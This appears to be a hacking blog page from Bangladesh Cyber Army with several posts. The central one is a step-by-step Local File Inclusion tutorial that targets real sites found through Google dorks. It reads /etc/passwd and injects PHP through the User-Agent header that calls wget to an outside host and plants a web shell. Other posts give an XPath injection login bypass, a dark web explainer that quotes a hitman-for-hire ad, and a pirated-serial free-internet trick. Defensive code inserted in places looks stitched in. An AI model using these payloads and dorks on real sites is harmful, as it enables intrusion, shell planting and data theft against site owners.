Welcome To Bangladesh Cyber Army

Bangladesh Cyber Army is a non-profit knowledge base in Bangladesh. Let us make a new world, a true world.


Showing posts with label Internet. Show all posts

Friday, March 1, 2013

World Wide Web Top Secret !



Nice to meet all of you. I still cannot write good bn, so please view this with forgiveness.

Remember the scene in the Hollywood film The Godfather where he never meets his hired murderer face to face, and the order travels in great secrecy through a network? Or the film starring Angelina Jolie, 'Hacker' (I do not know the exact name of the movie), where criminals operate inside a network right under the nose of law and order, which cannot touch them?

At first sight this is just silver-screen sci-fi, but such unknown networks are not false: they are the dark side of the Internet we know ...

With the advance of information technology the Internet has become a vast ocean, and the ability of search engines has grown with it. Google in particular has to be mentioned; it has become one of the most trusted brands. Can we even imagine a session on the net without it? Impossible!

But how far does Google's ability reach?

You will be surprised to know that the hundreds of thousands of results Google puts in front of you come from only 10 percent of the information on the Internet! Google does not know about 90 percent of online information. Only material from that 10 percent appears in front of the user in search results. The remaining 90 percent always stays unfamiliar to you.

A survey has shown that the amount of data stored in the invisible web is 500 times greater than the data on the visible web. In fact, the visible net is only the tip of the iceberg; the Deep Web is the real ocean itself!
Our topic today is this unknown Black Web.

The Black Web can be divided into two parts:

1. The Deep Web
2. The Dark Web

The Deep Web is the part of the Internet that search engines cannot find, but if you know an address, you can go to it.

The Dark Web is the part that you cannot reach in the conventional way; common browsers cannot enter it. You can enter only with the help of special software.

What is the origin of this part of the Internet? It is impossible to say for certain.

In fact, neither you nor I are alone on the Internet! Your Internet service provider watches your every action, every page you view and every download. Whenever needed, they supply your whole profile to the secret agencies. This means you have no freedom of movement!

In the world of the Internet, some groups felt the need for a system where they could manage their activities secretly. Armies, revolutionaries, hackers, and even real administrations wanted a system where offices could exchange information in confidence, or where stolen information could be bargained back from offenders. Online censorship is very strict in many countries, so opposition parties likewise wanted a system that the government could not control. This may have been the origin, but it is unknown. It drew all the offenders who, for fear of being caught, do not dare to talk on the ordinary net.

Now the question is: why can search engines not read the Deep Web?

This is because search engines do their searching with virtual robots called crawlers. A crawler records the HTML tags of the websites it visits. In addition, some sites are recorded in search engines at the site's own request. A site admin who does not want search engines to find the site uses the Robot Exclusion Protocol, which keeps crawlers from entering or indexing it. Some sites are dynamic, with pages that exist only in response to particular requests, and crawlers cannot find all of these. Some sites have no links from other sites; such isolated sites also stay out of the search.

Moreover, search engine technology is still old-fashioned. Text search engines cannot find web pages in other formats (such as Flash)!

Deep Web data is of higher quality than surface web information: it is very detailed and relevant. Now you understand what search engines are really searching!

The most interesting part is the Dark Web ...

Your usual web browser cannot access these sites. They operate outside normal Internet practice and do not follow the usual protocols. Their addresses are so odd (such as sdjsdhsjhsuyumnsdxkxcoioiydsu67686hsjdhjd.onion) that lay people find them very difficult to remember. These sites are the invisible part of the Internet. Without special knowledge (such as programming, networking, proxies) you cannot access this network. Another peculiarity of this part is that, instead of top-level domains (TLDs, such as .com), its sites use a "pseudo top-level domain" belonging to a second network beneath the original World Wide Web. Such domains include Bitnet, Onion, Freenet, and more.

It is a world of its own! You get things here that you cannot imagine in ordinary life. You would never imagine that material taken from secret agencies' sites is always available here. Whatever subject comes into your head, you can find it. This year WikiLeaks announced that they will release more new data, but you might be surprised to learn that all this data was posted on the Dark Web a number of years ago. The latest edition of any book, which copyright law keeps off the surface web, is passed around freely here.

There is also more depraved "entertainment"! Material kept off the surface web, from child pornography to genital mutilation videos, is a hot topic here.

There are sites that offer home delivery of all kinds of drugs, from marijuana to heroin. Dark web users are addicted.

There are sites where criminal groups give lessons on how to make "pudding powder", and some sites sell arms, from rocket launchers and mortars to weapons like the AK-47.

The democracy activists of the Arab Spring also joined the dark web. The dark web has a range of mail services and chat services where you can keep your identity secret.

And there's more! Several days ago I visited a site where a killer is available for hire! Terrible, is it not? The killer on the site describes his own way of working like this:
"I would call you up in slyat. I would not be able to offer the professional  end way. I know that I was not interested. You just give me the money and I will pay him that. Target age must be at least 18,
The target is male or girl that I can not come
I do not pregnant women as a target
I do not torture the target
If you're a member of a political personality or law enforcement agencies target the additional charge.
There is no extra charges for the fact that I am the sort of suicide or accident can.
After down payment done within four weeks.
Outside the U.S. for target 5000 dollars extra travel charge applicable.
I work, I'll send you pictures of targets "
It is a black forest: once you enter, think twice before you take each step. The hacking techniques that you see on the surface web are only 1% of the information on the dark web. The hackers there are formidable programmers as well, and they can hack your mail. Moreover, the government has agents there.

The question is how all this keeps working on a network right in front of the nose of law enforcement agencies.

We can understand a little about such a network ...

The network that made the dark web popular on the surface web is the onion network. Its pseudo-top-level domain is .onion. Its sites have spooky addresses! It was originally created for the U.S. Navy, but it became the first choice of network for users who want to stay masked. Your ordinary browser cannot open .onion sites; for that you can download the Tor Browser.

Tor hides your identity, so it becomes almost impossible to identify your location. When you access a site with Tor, your request is sent through the onion network with strong authenticated encryption. The data you send to the onion proxy is turned into a complicated scrambled form.

The onion proxy passes the data into the network, where member-run onion routers are waiting. Before entering the onion network the data is encrypted again with IPsec encryption at the gateway, and it is encrypted once more as it passes through the network. On the way it goes through several onion routers with IPsec encryption, where the output of one feeds the next and each router knows only that the data is coming from another router. Finally, when the data arrives in the recipient's hands, decryption returns it to its original form. Because of these many layers, the network is named the onion network.

Now, if someone steals this data in transit, they cannot find out who its sender or its receiver is! Even the onion routers themselves do not know. But yes, whoever monitors the two ends can work out the sender's and the receiver's location.
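The layering described above, as an added example that is not part of the original post: each relay removes exactly one layer and learns only the next hop. The cipher is a toy built from HMAC-SHA256 for illustration (it is not IPsec and not the cryptography Tor ships), and the relay names, keys and function names are assumptions.

```python
import hashlib
import hmac
import os


def _keystream(key, nonce, length):
    """Toy keystream: HMAC-SHA256(key, nonce || counter) blocks. Illustration only."""
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def seal(key, plaintext):
    """Add one layer: encrypt, then authenticate, under a single relay's key."""
    nonce = os.urandom(16)
    body = bytes(p ^ s for p, s in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    tag = hmac.new(key, b"tag" + nonce + body, hashlib.sha256).digest()
    return nonce + body + tag


def unseal(key, blob):
    """Remove one layer; ValueError means wrong key or a tampered blob."""
    if len(blob) < 48:
        raise ValueError("blob too short to be a layer")
    nonce, body, tag = blob[:16], blob[16:-32], blob[-32:]
    expected = hmac.new(key, b"tag" + nonce + body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("layer does not authenticate under this key")
    return bytes(c ^ s for c, s in zip(body, _keystream(key, nonce, len(body))))


def wrap(route, destination, message):
    """route is [(relay_name, key), ...], entry relay first. Returns the onion.

    The sender wraps from the inside out, so the entry relay's layer is outermost.
    """
    next_hops = [name for name, _ in route[1:]] + [destination]
    blob = message
    for (_, key), next_hop in reversed(list(zip(route, next_hops))):
        hop = next_hop.encode()
        blob = seal(key, bytes([len(hop)]) + hop + blob)
    return blob


def peel(key, blob):
    """What one relay does: strip its layer, read the next hop, forward the rest."""
    plain = unseal(key, blob)
    hop_len = plain[0]
    return plain[1:1 + hop_len].decode(), plain[1 + hop_len:]


def relay_through(route, onion):
    """Simulate forwarding. Returns ([(relay, next hop it learned)], delivered bytes)."""
    learned, blob = [], onion
    for name, key in route:
        next_hop, blob = peel(key, blob)
        learned.append((name, next_hop))
    return learned, blob


if __name__ == "__main__":
    # Constructed sample: three relays with random keys and a made-up destination.
    route = [(n, os.urandom(32)) for n in ("entry", "middle", "exit")]
    onion = wrap(route, "destination.example", b"hello")
    print(relay_through(route, onion))
```

The last relay in the chain recovers the message itself, which is why the text notes that someone watching both ends can still link sender and receiver.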
This is why law enforcement is kept away from the network all the time by this kind of mysterious system. The most popular black marketplace inside the onion network is Silk Road; according to Forbes, millions' worth was bought and sold there last year. Ordinary currency is not used for trading here; trade runs on a kind of virtual currency called Bitcoin. Microsoft and Apple products are found at 80% discount.

Why is a system with this kind of irregularity inside it supported?

Is there not a real need for an open platform? The network was not created for child pornography; it has been turned to that work in another way. And cyber-terrorists are always a step ahead of the service agencies. For example, Internet Protocol version 6 has yet to arrive on the surface web, which still uses the very old Internet Protocol version 4, but most of the underground is probably already using IPv6.

Since bad Internet users always adapt, it continues to be so. I would say visit the Dark Web once in a while; if you miss it, you are like a sailor on the ice shelf who never tastes the ocean.

If you do, do not go too far. There is plenty of money there, and thousands of talented hackers are for hire on the dark web, lying in wait.

Some tips

• When you access the Dark Web, stay away from Flash and Shockwave. They can easily overturn your anonymity.
• Use a paid proxy service. Military agencies use them, and their service is great.
• If the destination website is hacked, you may easily be exposed. Do not use your real data on the Dark Web.

Remember, on the Dark Web, as on the Surface Web, you are not alone: the walls have ears ...... Welcome to the Dark Web.


Wednesday, January 2, 2013

Free Internet Browsing and Download 100% By IDM !

Hello visitor,
Today I'll tell you how to use free internet with IDM (Internet Download Manager). Actually it is an old method, but it works 100%.
Step 1: Download the software
Step 2: Register your software by using our serial
Step 3: Disconnect the dial-up modem
Step 4: Start a download link. Then enter Waps as the username and password and press OK.


Use our Serial Key


Friday, October 19, 2012

Basic Ethical Hacking part 1

 Hack Website : Basic Information About Website Hacking Part 1
Well, I have posted lots of articles on email hacking, which includes phishing and keylogging etc., but today I would like to throw some light on a new topic, "Website Hacking". This is the first time I am writing an article on website hacking. I am writing it because there are lots of newbies with lots of misconceptions about hacking websites, so I hope this tutorial covers all those misconceptions, and if not all, then most of them.

Website security is a major problem today and should be a priority for any organization or webmaster. Nowadays hackers are concentrating a lot of their efforts on finding holes in web applications. If you are a website owner with a high PageRank and high traffic, then there is a chance that you might become a victim of these hackers.

A few years back there existed no proper tools to search for vulnerabilities, but nowadays there are tons of tools available (for SQL Injection, for example) through which even a newbie can find a vulnerable site and start hacking in just a few minutes.

Basic Information About Website Hacking
What is a website hack?
The files of your website are stored on a computer somewhere. The computer, called a "server" or "web server", is not too much different from your home PC, except that its configuration is specialized for making files available to the world wide web, so it has a lot of hard drive capacity and a very high speed internet connection. It probably doesn't have its own monitor or keyboard because everyone who communicates with it does so through its internet connection, just like you do.

With everybody connecting to your site through the internet, it might seem like just an accident if one of your files gets changed once in a while in all the commotion, but it's not.

Your website and server have several security systems that determine what kind of access each person has. You are the owner, so you have passwords that give you read/write access to your site. You can view files (read) and you can also change them (write). Everybody else only has read access. They can view your files, but they are never, ever supposed to be able to change them, delete them, or add new ones.

A hack occurs when somebody gets through these security systems and obtains write access to your server, the same kind you have. Once they obtain that, they can change, add, or delete files however they want. If you can imagine someone breaking into your home and sitting down at your PC with a box of installation CD's, that's what a website hack is like. They might do only a little damage, or a lot. The choice is up to them.

People often ask, "But how could my page, which was 100% pure HTML, have been hacked?"

The answer is that the defacement of the page wasn't the hack. The hack was when they got write access to the server. The "pure HTML" page had nothing at all to do with that.

Altering the page was simply the thing they chose to do after they got in. Once they get in, they can do ANYTHING, including alter your pages that are pure HTML. That is the reason why, after a hack, the most important thing isn't repairing the damage they did (which most people focus on), but finding out how they got in.

Who are the hackers?

Website hacking is one of the modern enterprises of organized crime, but if you think that means it's being done amateurishly by a bunch of elderly mobsters who took night classes in Computer ABC's to learn what "this Internet Explore thing is", think again. These organizations have professional programmers. Their campaigns to take control of thousands of the world's computers are well planned and sophisticated, drawing on an in-depth knowledge of operating system software, browser vulnerabilities, programming, and even psychology, and their attacks are almost always automated.

Strangely enough, if your site was hacked, it probably wasn't done by a person, but by another computer, which was hacked by another computer, which was hacked by yet another, and somewhere way back in the chain is a programmer who initially unleashed the sequence of events that set all these computers to attacking each other and building a giant network, a "botnet", a massively parallel virtual supercomputer whose purpose is to suck up all of the world's information that the criminals can efficiently turn into money. They need to have as many computers as possible recruited into the enterprise, and that's why they wanted to hack your little website.

Other hackers do it, whether they realize it or not, as affiliates of organized crime. Using tools provided by the larger organization, they get a small commission ($5, last I heard) for each website they successfully break into.

And there are still hackers who are motivated by fun, challenge, and prestige among their peers or by the desire to deface the site of someone they dislike, but their numbers and impact today are dwarfed by the commercial robotic crawling operations.

Why do they do it? What do they want?

What they want is money. While you may be racking your brain and tearing your hair out trying to figure out how to monetize your website, these people already know just how to do it, and they have a plan, too. You can't use the same monetization methods they do because their methods are illegal!

To use your server to make money, in approximate order of decreasing value and decreasing incidence of occurrence, they want:

    Your visitors' confidential financial information. They want credit card and Social Security numbers, FTP passwords, website logins, and other information from the people who trustingly visit your site. Credit card numbers are sold in bulk to brokers who resell them. More complete financial information is used in identity theft schemes involving mortgages or car loans.
    Theft methods:
        They install malicious content on your website so that your visitors are attacked with viruses, Trojans, keyloggers, and other spyware. Once on the PCs, the malware either searches for the data it wants, or keyloggers capture passwords as users log into their bank accounts. The stolen data is relayed to remote computers using the victim's internet connection. In spite of the availability of antivirus and antispyware software, many home PCs are still poorly protected, and one of the sophisticated attack packages (MPack) claims that it successfully infects 50% of the computers it attacks.
        They copy your customer database.
        They install spyware or phishing pages in your site, to grab data as your customers log in.
    Use of your visitors' computers. When they got into your server, they took control of one computer, but now they can attack all your visitors, too, and maybe get hundreds or thousands of new zombie computers under their control. One of the things that makes your server an attractive target is the opportunity to attack all these poorly protected PC's.
    Your mail server, for sending spam.
    Your server's high-speed internet connection, for relaying stolen data, spamming, communicating with other sites in a botnet, crawling the web searching for new websites to victimize, and attacking them.
    Free use of your server's processing power, to reprogram however they want.
    Free use of your webspace, to host illegal content or even an entire illegal website. They avoid webhosting fees, electricity bills, and can engage in activities that no webhost would allow, leaving you with the worries about TOS violations and legal liability. Even after you clean up the site and remove the content, it may remain indexed by search engines for months.
    Examples:
        Phishing sites: they create a fake (spoof) site that looks like a popular one such as PayPal. Then they send spam emails containing links to the phishing page on your site. When victims log in, thinking it's PayPal, your site steals their login data and relays it to a remote computer. Then the thieves log into the real PayPal accounts and steal the money.
        Illegal pornographic content.
        Use your web space to store PHP or Perl scripts like c99 or r57 for use in Remote File Inclusion (RFI) attacks on other sites, making your site look like the attacker.
    Your traffic. They put visible links on your pages that visitors on your site can follow. Or they install code to redirect all of your traffic to a different site. Either way, your visitors become their visitors.
    Your money, by extortion, threatening to launch a worse attack against your site if you don't pay them.
    Your PageRank. By putting invisible outbound links on your pages (so only search engines see them) they inflate another site's inbound links and boost its PageRank. Appearing higher in search results makes more money for them.
    Your advertising space. They monetize your popularity by inserting their ads onto your pages. Clicks are credited to them.

Common Methods used for Website Hacking

There are lots of methods that can be used to hack a website but most common ones are as follows:

    SQL Injection
    Cross Site Scripting (XSS)
    Remote File Inclusion(RFI)
    Local File inclusion(LFI)
    Directory Traversal
    Cross-site request forgery( CSRF )
    SSI Injection
    LDAP Injection
    XPath Injection
    Denial of Service - DOS Attacks

In this article, I have just shared basic information on hacking websites. I hope you have liked the post up till now. I will cover the methods to hack a website in the next post, so stay tuned!


Web site Hacking by Local File Inclusion (LFI)

In previous articles we have discussed various website hacking tutorials like How to find a vulnerable Website?, Basic information of website hacking, XSS Tutorial, (CSRF/XSRF) and Remote File Inclusion Tutorial.

In this tutorial I show you how to get a shell on websites using Local File Inclusion (LFI) vulnerabilities and injecting malicious code into proc/self/environ. It is a step-by-step tutorial.
How To Hack Website Using Local File Inclusion (LFI)

Follow these steps to hack a website using LFI and upload a shell on the hacked website.
Step 1: Search for LFI vulnerable sites
Now we are going to find a Local File Inclusion vulnerable website using some dorks. Search these dorks in Google to get LFI vulnerable sites.

    inurl:redirect.php?page=
    inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
    inurl:/include/new-visitor.inc.php?lvc_include_dir=
    inurl:/_functions.php?prefix=
    inurl:/cpcommerce/_functions.php?prefix=
Here I am using the following Google dork:

    inurl:redirect.php?page=

Search that in google, and you should come up with a link like this:

    www.website.com/view.php?page=contact.php

Step 2: Test Local File Inclusion vulnerability
Now let's replace contact.php with ../ so the URL will become

    www.website.com/view.php?page=../

and we got an error

    Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

There is a big chance of a Local File Inclusion vulnerability. Let's go to the next step.

Now let's check for etc/passwd to see if the site is Local File Inclusion vulnerable. Let's make a request:

    www.website.com/view.php?page=../../../etc/passwd

We got an error and no etc/passwd file

    Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

so we go more directories up

    www.website.com/view.php?page=../../../../../etc/passwd

We successfully included the etc/passwd file.

    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    news:x:9:13:news:/etc/news:
    uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
    operator:x:11:0:operator:/root:/sbin/nologin
    games:x:12:100:games:/usr/games:/sbin/nologin
    test:x:13:30:test:/var/test:/sbin/nologin
    ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
    nobody:x:99:99:Nobody:/:/sbin/nologin

Note: well, if the Local File Inclusion vulnerable site URL is,

    www.site.com/test.php?main=lol.php

that means,

    PHP Code:
    include $main; 

so you cant go with it with any nullbyte

    ../../etc/passwd 

and if Local File Inclusion vulnerable site url like

    www.site.com/test.php?main=lol

well that means the include has .php with it as in

    PHP Code:
    include $main.'.php';

well actually we know that mean the .php comes to the end of it so we have to use the nullbyte for this one.

    ../etc/passwd

Step 3: Checking if proc/self/environ is accessible
Now let's see if proc/self/environ is accessible. We replace etc/passwd with proc/self/environ

    www.website.com/view.php?page=../../../../../proc/self/environ

If you get something like

    DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80

then proc/self/environ is accessible. If you get a blank page or an error, proc/self/environ is not accessible or the OS is FreeBSD.
Step 4: Injecting malicious code
Now let's inject our malicious code in proc/self/environ. How can we do that? We can inject our code in the User-Agent HTTP header.
Use the Tamper Data add-on for Firefox to change the User-Agent. Start Tamper Data in Firefox and request the URL:

    www.website.com/view.php?page=../../../../../proc/self/environ

Choose Tamper and in the User-Agent field write the following code:

    <?system(‘wget http://hack-bay.com/Shells/gny.txt -O shell.php’);?>

Then submit the request.
Our command will be executed (will download the txt shell from http://hack-bay.com/Shells/gny.txt and will save it as shell.php in the website directory) through system(), and our shell will be created. If it doesn't work, try exec(), because system() can be disabled on the webserver from php.ini.
Step 5: Access our shell
Now let's check if our malicious code was successfully injected. Let's check if the shell is present.

    www.website.com/shell.php

Our shell is there. Injection was successful.
So friends, I hope you will like this Local File Inclusion Tutorial.
I have personally tested this Website Hacking Tutorial and found all are working. If you have any problem with the above Website Hacking Using Remote File Inclusion Tutorial, please mention it in the comments section.
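From the defender's side, every step of the tutorial above leaves a trace in the web server's access log. The following is an added example, not code from the original post: a detector for those traces over constructed "combined"-format log lines. It goes slightly beyond the post by also decoding double-encoded requests; the function names, sample IP addresses and log lines are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# ".." used as a whole path segment, after "=", "/" or "\".
TRAVERSAL = re.compile(r'(?:^|[=/\\])\.\.(?:[/\\]|$)')
# The two files the tutorial requests through the include parameter.
SENSITIVE_TARGETS = ("etc/passwd", "proc/self/environ")


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so %2F and %252F both end up as '/'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_line(line):
    """Return (client_ip, set_of_findings), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    uri = fully_decode(m.group("uri"))
    findings = set()
    if TRAVERSAL.search(uri):
        findings.add("path-traversal")
    if any(target in uri for target in SENSITIVE_TARGETS):
        findings.add("sensitive-file")
    if "\x00" in uri:
        findings.add("null-byte")
    # A PHP open tag in User-Agent is the /proc/self/environ injection step.
    if "<?" in fully_decode(m.group("ua")):
        findings.add("php-in-user-agent")
    return m.group("ip"), findings


def summarize(lines):
    """Group findings per client IP; clients with no findings are omitted."""
    per_ip = defaultdict(set)
    for line in lines:
        result = inspect_line(line)
        if result and result[1]:
            per_ip[result[0]] |= result[1]
    return {ip: sorted(found) for ip, found in per_ip.items()}


# Constructed sample log (documentation IP ranges, placeholder User-Agent payload).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Oct/2012:10:00:01 +0000] "GET /view.php?page=contact.php HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [19/Oct/2012:10:02:11 +0000] "GET /view.php?page=../ HTTP/1.1" '
    '200 312 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [19/Oct/2012:10:02:40 +0000] "GET /view.php?page=../../../../../etc/passwd HTTP/1.1" '
    '200 1644 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [19/Oct/2012:10:03:05 +0000] '
    '"GET /view.php?page=..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" '
    '200 2210 "-" "<?php /* constructed placeholder */ ?>"',
    '203.0.113.44 - - [19/Oct/2012:11:15:00 +0000] '
    '"GET /test.php?main=%252e%252e%252fetc%252fpasswd%2500 HTTP/1.1" 404 209 "-" "curl/7.27.0"',
]

if __name__ == "__main__":
    for ip, found in summarize(SAMPLE_LOG).items():
        print(ip, found)
```

Detection complements the fix rather than replacing it: the `page` parameter should select from a fixed allow-list of files instead of being passed to `include`.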

Thursday, October 18, 2012

Xpath Injection Website Hacking Technic !

Every day many websites get hacked, but most of the hackers are hacking those websites just for popularity, nothing else. Today I am writing this tutorial on XPath Injection, in which I will explain how hackers hack websites using XPath Injection.

In a typical web application architecture, all data is stored on a database server. This database server stores data in various formats such as LDAP, XML or an RDBMS database. The application queries the server and accesses the information based on the user input.

Normally attackers try to extract more information than allowed by manipulating the query with specially crafted inputs. Here, in this tutorial, we'll be discussing XPath Injection techniques to extract data from XML databases.

XPath Injection Tutorial To Hack Websites Database

Before we go deeper into XPath injection, let's take a brief look at what XML and XPath are.
What is XML?
XML stands for Extensible Markup Language and was designed to describe data. It provides a platform for programmers to create their own customized tags to store data on a database server. An XML document is mostly similar to an RDBMS database except for the way data is stored. In a normal database, data is stored in table rows and columns; in XML, the data is stored in nodes in a tree form.
What is XPath?
XPath is a query language used to select data from XML data sources. It is increasingly common for web applications to use XML data files on the back-end, using XPath to perform queries much the same way SQL would be used against a relational database.
XPath injection, much like SQL injection, exists when a malicious user can insert arbitrary XPath code into form fields and URL query parameters in order to inject this code directly into the XPath query evaluation engine. Doing so would allow a malicious user to bypass authentication (if an XML-based authentication system is used) or to access restricted data from the XML data source.

Let's learn with the help of examples that show how XPath works. Let's assume that our database is represented by the following XML file:

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <users>
    <user>
    <username>wildhacker</username>
    <password>123</password>
    <account>admin</account>
    </user>
    <user>
    <username>cutler</username>
    <password>jay</password>
    <account>guest</account>
    </user>
    <user>
    <username>ronie</username>
    <password>coleman</password>
    <account>guest</account>
    </user>
    </users>


The above code shows how username, password and user account details are stored in the XML file.

The following XPath query returns the account whose username is "wildhacker" and whose password is "123":

    string(//user[username/text()='wildhacker' and password/text()='123']/account/text())


If the application developer does not properly filter user input, the tester or hacker will easily be able to inject XPath code and interfere with the query result. For instance, the hacker or tester could input the following values:

    Username: ' or '1' = '1
    Password: ' or '1' = '1


Using these above parameters, the query becomes:

    string(//user[username/text()='' or '1' = '1' and password/text()='' or '1' = '1']/account/text())


As in a common SQL Injection attack, we have created a query that always evaluates to true, which means that the application will authenticate the user even if a username or a password has not been provided.

And as in a common SQL Injection attack, with XPath injection the first step is to insert a single quote (') in the field to be tested, introducing a syntax error in the query, and to check whether the application returns an error message.

If there is no knowledge about the internal details of the XML data, and if the application does not provide useful error messages that help us reconstruct its internal logic, it is possible to perform a Blind XPath Injection attack (I will explain that in the next tutorials), whose goal is to reconstruct the whole data structure. The technique is similar to inference-based SQL Injection, as the approach is to inject code that creates a query that returns one bit of information.
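The login bypass described above and its fix, as an added example that is not part of the original post. It runs the page's query shape against the page's XML with a small stand-in evaluator covering only the operators that query uses (`=`, `and`, `or`, string literals, `child/text()`); the evaluator and all function names are assumptions.

```python
import hmac
import re
import xml.etree.ElementTree as ET

# The XML "database" from the page.
USERS = ET.fromstring("""<users>
  <user><username>wildhacker</username><password>123</password><account>admin</account></user>
  <user><username>cutler</username><password>jay</password><account>guest</account></user>
  <user><username>ronie</username><password>coleman</password><account>guest</account></user>
</users>""")

# Tokens of the XPath 1.0 subset used in the page's predicate.
TOKEN = re.compile(r"\s*(?:'([^']*)'|(\w+)/text\(\)|(=|and\b|or\b))")


def tokenize(predicate):
    tokens, pos = [], 0
    predicate = predicate.rstrip()
    while pos < len(predicate):
        m = TOKEN.match(predicate, pos)
        if m is None:
            raise ValueError("XPath syntax error at offset %d" % pos)
        literal, child, op = m.groups()
        if literal is not None:
            tokens.append(("lit", literal))
        elif child is not None:
            tokens.append(("child", child))
        else:
            tokens.append(("op", op))
        pos = m.end()
    return tokens


def evaluate(predicate, node):
    """Evaluate the predicate for one <user> node; 'and' binds tighter than 'or'."""
    tokens = tokenize(predicate)
    pos = 0

    def peek(op):
        return pos < len(tokens) and tokens[pos] == ("op", op)

    def operand():
        nonlocal pos
        if pos >= len(tokens) or tokens[pos][0] == "op":
            raise ValueError("XPath syntax error: operand expected")
        kind, value = tokens[pos]
        pos += 1
        return value if kind == "lit" else node.findtext(value, default="")

    def comparison():
        nonlocal pos
        left = operand()
        if peek("="):
            pos += 1
            return left == operand()
        return bool(left)

    def operands_joined_by(op, parse):
        nonlocal pos
        values = [parse()]
        while peek(op):
            pos += 1
            values.append(parse())
        return values

    def conjunction():
        return all(operands_joined_by("and", comparison))

    result = any(operands_joined_by("or", conjunction))
    if pos != len(tokens):
        raise ValueError("XPath syntax error: unexpected token")
    return result


def login_vulnerable(username, password):
    """Builds the predicate by string concatenation, like the query on the page."""
    predicate = "username/text()='%s' and password/text()='%s'" % (username, password)
    for user in USERS.iter("user"):
        if evaluate(predicate, user):
            return user.findtext("account")  # string() keeps the first match
    return ""


def login_safe(username, password):
    """Treats input purely as data: it is compared, never parsed as XPath."""
    for user in USERS.iter("user"):
        name_ok = hmac.compare_digest(user.findtext("username", "").encode(), username.encode())
        pass_ok = hmac.compare_digest(user.findtext("password", "").encode(), password.encode())
        if name_ok and pass_ok:
            return user.findtext("account")
    return ""
```

Because the injected predicate is true for every node and `string()` keeps the first match, the caller is handed the first account in the file, which here is the admin.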

That’s it.

So friends, I hope you will like this

Tuesday, October 16, 2012

How To make your own Radio Station ...

Hello Visitor
Today I will show how to make your own radio station. You can do it absolutely free and safely. You must have Winamp (5.5 or later required).

First things first: your speed has to be at least 256/64 kbps (which means dial-up users will have a lot of latency, so just don't bother).

Second, you're going to need a domain, an updated one with the current IP active. (Could be anything, e.g. my sig)

Now, you're going to have to download the SHOUTcast files.

Go to
www.shoutcast.com

to get the files.Or Download Hare 3 Software File-1 , File-2 and File-3

Ok After downloading these, installing Both of them in any order i dnt care. Go to START>PROGRAM FILES>SHOUTcast DNAS>EDIT SHOUTCAST DNS CONFIG.
Ok your gonna have to Configure it:
Go Down and where it says password: change (that means your gonna have to change it to whatever, make sure u remember)

The Portbase: change it to whatever port you want it
Maxusers: (lets be realistic here, dnt put in 10000, like NXS's radio station) your bandwidth has to be extremely good, if your cable, 50 user max is ok, ADSL should stay below 10 users, and T1 connections should do whatever tickles there fantasy.

EDIT>SAVE.

Open Winamp, RIGHT CLICK>OPTIONS>PREFERENCES>DSP EFFECT> and choose the NULLSOFT SHOUTCAST.

Go to OUTPUT, and then click on Connection. In ADDRESS, type the address which you set up through www.no-ip.com.

For PORT NUMBER, enter whatever you set in the EDIT.txt, and then your password.

Then go to Encoder, and choose the quality of your music. Go back to OUTPUT>OUTPUT CONFIG>YELLOW PAGES. This is your advertisement information. Do whatever you like there.

Now connect. To check that your radio is online, go to http://yoursite.com (the address that you added in the preferences). That's it.


Monday, October 15, 2012

